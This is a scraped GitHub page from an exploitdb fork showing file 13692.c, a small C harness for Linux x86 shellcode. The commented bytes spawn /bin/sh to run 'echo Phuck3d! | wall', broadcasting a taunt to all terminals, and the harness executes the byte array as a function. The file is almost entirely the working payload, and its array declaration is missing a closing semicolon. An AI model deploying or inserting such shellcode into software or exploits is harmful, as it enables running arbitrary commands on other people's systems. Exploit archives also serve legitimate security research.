forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path13692.c
More file actions
executable file
·45 lines (36 loc) · 1.29 KB
/
13692.c
File metadata and controls
executable file
·45 lines (36 loc) · 1.29 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
/*
$Id: where-is-wallie.c, v 1.0 2010/04/24 18:32:29 condis Exp $
linux/x86 sends "Phuck3d!" to all terminals (60 bytes) shellcode
by condis
Tested on: Linux Debian
*/
int main(void)
{
char evil[] =
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x99" // cltd
"\x52" // push %edx
"\x68\x77\x61\x6c\x6c" // push $0x6c6c6177
"\x68\x21\x20\x7c\x20" // push $0x207c2021
"\x68\x63\x6b\x33\x64" // push $0x64336b63
"\x68\x20\x50\x68\x75" // push $0x75685020
"\x68\x65\x63\x68\x6f" // push $0x6f686365
"\x89\xe6" // mov %esp,%esi
"\x52" // push %edx
"\x66\x68\x2d\x63" // pushw $0x632d
"\x89\xe1" // mov %esp,%ecx
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x56" // push %esi
"\x51" // push %ecx
"\x53" // push %ebx
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
void(*boom)()=(void*)evil;
boom();
return 0;
}